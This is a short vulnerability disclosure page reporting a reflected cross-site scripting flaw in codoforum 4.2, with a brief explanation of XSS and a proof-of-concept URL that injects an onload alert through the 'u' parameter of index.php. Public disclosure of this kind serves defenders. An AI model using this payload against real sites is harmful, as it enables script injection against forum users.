codoforum 4.2 XSS vulnerability (reflected)

2018.03.03

Mohamed diaa (EG)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

========================================================================
| # Title     : codoforum 4.2 XSS vulnerability (reflected)
| # Author    : Mohamed diaa
| # email     : moha200@protonmail.com
| # Tested on : chrome - windows 7
| # Version   : 4.2
| # Vendor    : https://codoforum.com/
========================================================================
Request Method(s):
[+] GET
Vulnerable Function(s):
[+] index.php
Vulnerable Parameter(s):
[+] u
Proof of Concept (PoC):
========================
Cross-Site Scripting, also known as XSS, is one of the most common attacks carried out in web applications. 
The concept of XSS is to manipulate the client-side scripts of a web application to perform actions planned by a malicious user.
Reflected Cross-Site Scripting occurs when data sent by the attacker to the application is displayed on the page without the need to be stored somewhere.
[+] http://location/codoforum/index.php?u=%2fnaf3r%22%20onload%3dalert(1)%20vdkyo

See this note in RAW Version

Vote for this issue:

88%

12%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

codoforum 4.2 XSS vulnerability (reflected)

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.